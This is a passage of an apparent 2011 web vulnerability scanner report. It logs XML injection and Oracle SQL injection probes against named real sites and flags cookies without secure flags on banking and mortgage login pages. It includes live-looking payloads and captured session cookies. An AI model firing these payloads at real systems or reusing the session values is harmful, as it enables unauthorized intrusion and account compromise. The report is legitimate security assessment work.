Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 16:26:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 16:26:51 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: adc=RSP; path=/;
Content-Length: 6533

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
<!-- START listxml Partial -->
...[SNIP]...

8.20. http://www.myfinances.com/solo/form/dispatcher [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.myfinances.com
Path:   /solo/form/dispatcher

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /solo]]>>/form/dispatcher HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:04:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:04:42 GMT
Content-Length: 6490
Connection: close
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
<!-- START listxml Partial -->
...[SNIP]...

8.21. http://www.myfinances.com/solo/form/dispatcher [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.myfinances.com
Path:   /solo/form/dispatcher

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /solo/form]]>>/dispatcher HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:04:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:04:53 GMT
Content-Length: 6490
Connection: close
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
<!-- START listxml Partial -->
...[SNIP]...

8.22. http://www.myfinances.com/solo/form/dispatcher [REST URL parameter 3]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.myfinances.com
Path:   /solo/form/dispatcher

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /solo/form/dispatcher]]>> HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:05:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:05:20 GMT
Content-Length: 6490
Connection: close
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
<!-- START listxml Partial -->
...[SNIP]...

9. SQL statement in request parameter
There are 3 instances of this issue:

Issue description

The request appears to contain SQL syntax. If this is incorporated into a SQL query and executed by the server, then the application is almost certainly vulnerable to SQL injection.

You should verify whether the request contains a genuine SQL query and whether this is being executed by the server.

Issue remediation

The application should not incorporate any user-controllable data directly into SQL queries. Parameterised queries (also known as prepared statements) should be used to safely insert data into predefined queries. In no circumstances should users be able to control or modify the structure of the SQL query itself.


9.1. https://app.insightgrit.com/1/nat

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://app.insightgrit.com
Path:   /1/nat

Request

GET /1/nat?id=94375989827&ref=&z=217634&purl=https://www.supermedia.com/spportal/spportalFlow.do?_flowExecutionKey=%27%7C%7C(utl_inaddr.get_host_address((select+chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))%7C%7C%27 HTTP/1.1
Accept: */*
Referer: https://www.supermedia.com/spportal/spportalFlow.do?_flowExecutionKey=%27%7C%7C(utl_inaddr.get_host_address((select+chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))%7C%7C%27
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: app.insightgrit.com
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 302 Found
Date: Thu, 03 Feb 2011 18:59:42 GMT
Server: Apache
Location: https://app.insightgrit.com/Visit37.php?vt=V&id=94375989827&ref=&z=217634&purl=https://www.supermedia.com/spportal/spportalFlow.do%3f_flowExecutionKey=%2527%257C%257C(utl_inaddr.get_host_address((select+chr(95)%257C%257Cchr(33)%257C%257Cchr(64)%257C%257Cchr(51)%257C%257Cchr(100)%257C%257Cchr(105)%257C%257Cchr(108)%257C%257Cchr(101)%257C%257Cchr(109)%257C%257Cchr(109)%257C%257Cchr(97)+from+DUAL)))%257C%257C%2527
Content-Length: 614
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://app.insightgrit.com/Visit37.php?vt=V&am
...[SNIP]...

9.2. https://app.insightgrit.com/Visit37.php

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://app.insightgrit.com
Path:   /Visit37.php

Request

GET /Visit37.php?vt=V&id=94375989827&ref=&z=217634&purl=https://www.supermedia.com/spportal/spportalFlow.do%3f_flowExecutionKey=%2527%257C%257C(utl_inaddr.get_host_address((select+chr(95)%257C%257Cchr(33)%257C%257Cchr(64)%257C%257Cchr(51)%257C%257Cchr(100)%257C%257Cchr(105)%257C%257Cchr(108)%257C%257Cchr(101)%257C%257Cchr(109)%257C%257Cchr(109)%257C%257Cchr(97)+from+DUAL)))%257C%257C%2527 HTTP/1.1
Accept: */*
Referer: https://www.supermedia.com/spportal/spportalFlow.do?_flowExecutionKey=%27%7C%7C(utl_inaddr.get_host_address((select+chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))%7C%7C%27
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: app.insightgrit.com
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 18:59:37 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Thu, 03 Feb 2011 18:59:37 GMT
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: PHPSESSID=f7173c41fd6dd0db660d473234eef682; path=/
Set-Cookie: IG94375=f7173c41fd6dd0db660d473234eef682; expires=Mon, 04-Apr-2011 18:59:37 GMT; domain=app.insightgrit.com
p3p: policyref="w3c/p3policy.xml#tracking", CP="IDC DSP COR CUR DEVa TAIi IVAi IVDi CONi OUR STP ONL UNI PUR INT"
Content-Length: 49
Connection: close
Content-Type: image/gif

GIF89a...................!.......,...........T..;

9.3. https://www.supermedia.com/spportal/spportalFlow.do

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://www.supermedia.com
Path:   /spportal/spportalFlow.do

Request

GET /spportal/spportalFlow.do?_flowExecutionKey=%27%7C%7C(utl_inaddr.get_host_address((select+chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))%7C%7C%27 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.supermedia.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:00:04 GMT
Set-Cookie: JSESSIONID=288FFBAC45FB01B3489845E2C7FB3FFF.app3-a1; Path=/; Secure
Set-Cookie: trafficSource=default; Expires=Sat, 05-Mar-2011 18:59:58 GMT; Path=/
Set-Cookie: CstrStatus=U; Expires=Sat, 05-Mar-2011 18:59:58 GMT; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Set-Cookie: NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139e45525d5f4f58455e445a4a42378b;path=/
Content-Length: 19973


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<!-- UI framework designed and implemented by Advertiser Portal UI Team -->

<title>SuperPages
...[SNIP]...

10. SSL cookie without secure flag set
There are 166 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.


10.1. https://220marketing9-px.rtrk.com/

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://220marketing9-px.rtrk.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: 220marketing9-px.rtrk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:08:21 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.2.6
Set-Cookie: RlocalUID=tc%3D11020308082586054; domain=.rtrk.com; path=/
X-RL-Host: pweb105
X-Robots-Tag: noindex,nofollow
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Set-Cookie: PHPSESSID=a1d6aa999b794b82c01268b563cd3d7c;path=/
Vary: Accept-Encoding
Content-Length: 2082
Connection: close


<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">

...[SNIP]...

10.2. https://app.insightgrit.com/Visit37.php

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://app.insightgrit.com
Path:   /Visit37.php

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Visit37.php?vt=V&id=94375989827&ref=&z=217634&purl=https://www.supermedia.com/spportal/spportalFlow.do%3f_flowExecutionKey=%2527%257C%257C(utl_inaddr.get_host_address((select+chr(95)%257C%257Cchr(33)%257C%257Cchr(64)%257C%257Cchr(51)%257C%257Cchr(100)%257C%257Cchr(105)%257C%257Cchr(108)%257C%257Cchr(101)%257C%257Cchr(109)%257C%257Cchr(109)%257C%257Cchr(97)+from+DUAL)))%257C%257C%2527 HTTP/1.1
Accept: */*
Referer: https://www.supermedia.com/spportal/spportalFlow.do?_flowExecutionKey=%27%7C%7C(utl_inaddr.get_host_address((select+chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))%7C%7C%27
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: app.insightgrit.com
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 18:59:37 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Thu, 03 Feb 2011 18:59:37 GMT
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: PHPSESSID=f7173c41fd6dd0db660d473234eef682; path=/
Set-Cookie: IG94375=f7173c41fd6dd0db660d473234eef682; expires=Mon, 04-Apr-2011 18:59:37 GMT; domain=app.insightgrit.com
p3p: policyref="w3c/p3policy.xml#tracking", CP="IDC DSP COR CUR DEVa TAIi IVAi IVDi CONi OUR STP ONL UNI PUR INT"
Content-Length: 49
Connection: close
Content-Type: image/gif

GIF89a...................!.......,...........T..;

10.3. https://cibng.ibanking-services.com/cib/CEBMainServlet/Login

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://cibng.ibanking-services.com
Path:   /cib/CEBMainServlet/Login

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cib/CEBMainServlet/Login?FIORG=330&FIFID=124085066 HTTP/1.1
Host: cibng.ibanking-services.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 13:44:22 GMT
Server: IBM_HTTP_Server
Pragma: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-Cache
Set-Cookie: wf=wf
Set-Cookie: sessionId=nullCookie; Path=/
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 9003


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<title>Personal Savings from American Express : Welcome to Personal Savings from American
...[SNIP]...

10.4. https://icapture.regions.com/

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://icapture.regions.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: icapture.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 03 Feb 2011 15:53:25 GMT
Set-Cookie: ORA_OAAM_UIO_SessionId=FNvbFqGyTdfWYryl2D5XoaYx7Ss=; path=/
Location: https://icapture.regions.com/QuickDeposit/Login.faces?DOMAIN=customerDomain&LOCALE=en_US&SHOWTIPS=true
Cache-Control: no-cache
Content-Length: 0
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_jdbquvsf.sfhjpot.dpn-ngb-wjq=ffffffffaf137d9645525d5f4f58455e445a4a423660;path=/
Set-Cookie: NSC_jdbquvsf.sfhjpot.dpn=ffffffffaf130d0c45525d5f4f58455e445a4a423660;path=/;secure


10.5. https://mappoint-css.live.com/mwssignup/

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://mappoint-css.live.com
Path:   /mwssignup/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mwssignup/ HTTP/1.1
Host: mappoint-css.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 19:06:17 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: ASP.NET_SessionId=ygweoz45fmxyoqio3eycxw55; path=/; HttpOnly
Cache-Control: private
Expires: Thu, 03 Feb 2011 19:06:17 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 6559


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><title>
   
...[SNIP]...

10.6. https://mymortgage.regionsmortgage.com/upmb/disp

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://mymortgage.regionsmortgage.com
Path:   /upmb/disp

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /upmb/disp HTTP/1.1
Host: mymortgage.regionsmortgage.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 15:51:13 GMT
Pragma: no-cache
Content-Type: text/html
Expires: Tue, 08 Oct 1996 08:00:00 GMT
Set-Cookie: JSESSIONID=78X4NKTR3XNJGSYhhZ2Th2xpf6D1CSTrYyWpz8GbMbm8n2BGT18T!1999683069; path=/
Cache-control: no-cache, no-store
Set-Cookie: NSC_nznpsuhbhf.npsuhbhf-wjq=ffffffffaf130cdc45525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:17:21 GMT;path=/
Set-Cookie: rfaft2c2=TIIccZiIP1T3jbTn/4+C2tgIaLwA1; Domain=.regionsmortgage.com; Path=/; HttpOnly
Set-Cookie: rfaft2c2_.regionsmortgage.com_%2F_wlf=TlNDX256bnBzdWhiaGYubnBzdWhiaGYtd2px?D4D4YCjJgK/ADH0JDBFgf3TtVNUA&; Domain=.regionsmortgage.com; Expires=Wed, 01 Jan 2020 00:00:00 GMT; Path=/; HttpOnly
Set-Cookie: rfaft2c2_.regionsmortgage.com_%2F_wat=SlNFU1NJT05JRF9f?6SUL/QqXtn1Mtp8iwPpbvOz/oRQA&; Domain=.regionsmortgage.com; Path=/; HttpOnly
X-Expires-Orig: Tue, 08 Oct 1996 08:00:00 GMT
Set-Cookie: NSC_nznpsuhbhf.sfhjpot.dpn=ffffffffaf130d0d45525d5f4f58455e445a4a423660;path=/;secure
Content-Length: 10264


<html>

<head>
<title>Regions Mortgage Login</title>
<script language="javascript" src="/upmb/resource/js/regions/common.jsp"></script>
<script language="javascript" src="/upmb/
...[SNIP]...

10.7. https://online.americanexpress.com/myca/fuidfyp/us/action

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://online.americanexpress.com
Path:   /myca/fuidfyp/us/action

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /myca/fuidfyp/us/action?request_type=un_fuid&Face=en_US&entry_point=lnk_fuid&ReqSource=https%3A%2F%2Fonline.americanexpress.com%2Fmyca%2Facctsumm%2Fus%2Faction%3Frequest_type%3Dauthreg_acctAccountSummary%26us_nu%3Dlogincontrol%26inav%3Dmenu_acct_summary HTTP/1.1
Host: online.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_f3-nzdb-vt-bddutvnn-vt-5655=ffffffff97a3d0f645525d5f4f58455e445a4a42861c; sroute=655231498.58148.0000; SaneID=173.193.214.243-1296742163652146; NSC_nf3-x-vt-mphpo-b=ffffffff97a3d1ab45525d5f4f58455e445a4a42be89;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:10:40 GMT
Server: IBM_HTTP_Server
Set-Cookie: JSESSIONID=0000Jz4mHzg_qVcKbC230bQg2uT:14hqhu881; Path=/
Set-Cookie: MATFSI=IPCFSI::true~BBV::~; Path=/; Domain=.americanexpress.com
Set-Cookie: blueboxvalues=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/; Domain=.americanexpress.com; Secure
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Set-Cookie: NSC_nf3-x-vt-gvjegzq-c=ffffffff97a3d1c645525d5f4f58455e445a4a4299fa;path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Connection: close
Set-Cookie: sroute=957221386.58404.0000; path=/
Vary: Accept-Encoding, User-Agent
Content-Length: 57111


<noscript>
<meta http-equiv="Refresh" CONTENT="0;URL=action?request_type=un_fuid&Face=en_US&JSDisabled=true">
</noscript>



...[SNIP]...

10.8. https://online.americanexpress.com/myca/logon/us/action

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://online.americanexpress.com
Path:   /myca/logon/us/action

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /myca/logon/us/action HTTP/1.1
Host: online.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 03 Feb 2011 13:45:22 GMT
Server: IBM_HTTP_Server
Set-Cookie: SaneID=10.10.14.1-1296740722515782; Path=/; expires=Sun, 07-Feb-16 13:45:22 GMT; domain=.americanexpress.com
Location: https://online.americanexpress.com/myca/logon/us/en/en_US/common/sorry.jsp
Content-Length: 0
Set-Cookie: JSESSIONID=0000-t-4zcMemK8YS5_KVa9xE0B:14fidvuhe; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Set-Cookie: NSC_nf3-x-vt-mphpo-b=ffffffff97a3d0fb45525d5f4f58455e445a4a42be89;path=/
Content-Type: text/html
Content-Language: en-US
Connection: close
Set-Cookie: sroute=655231498.58148.0000; path=/


10.9. https://online.americanexpress.com/myca/ocareg/us/action

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://online.americanexpress.com
Path:   /myca/ocareg/us/action

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /myca/ocareg/us/action?request_type=un_Register&Face=en_US&DestPage=https%3A%2F%2Fonline.americanexpress.com%2Fmyca%2Facctsumm%2Fus%2Faction%3Frequest_type%3Dauthreg_acctAccountSummary%26us_nu%3Dlogincontrol%26inav%3Dmenu_acct_summary HTTP/1.1
Host: online.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_f3-nzdb-vt-bddutvnn-vt-5655=ffffffff97a3d0f645525d5f4f58455e445a4a42861c; sroute=655231498.58148.0000; SaneID=173.193.214.243-1296742163652146; NSC_nf3-x-vt-mphpo-b=ffffffff97a3d1ab45525d5f4f58455e445a4a42be89;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:10:41 GMT
Server: IBM_HTTP_Server
Set-Cookie: JSESSIONID=0000rmOJEhCd6bj0QqgWui3AFIH:14ia6bumi; Path=/
Set-Cookie: MATFSI=IPCFSI::true~BBV::~; Path=/; Domain=.americanexpress.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Set-Cookie: NSC_nf3-x-vt-pdbsfhx0-b=ffffffff97a3d1e545525d5f4f58455e445a4a42be8b;path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Connection: close
Set-Cookie: sroute=353241610.58660.0000; path=/
Vary: Accept-Encoding, User-Agent
Content-Length: 48074

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>

<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859
...[SNIP]...

10.10. https://onlineimagelockbox.regions.com/

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://onlineimagelockbox.regions.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

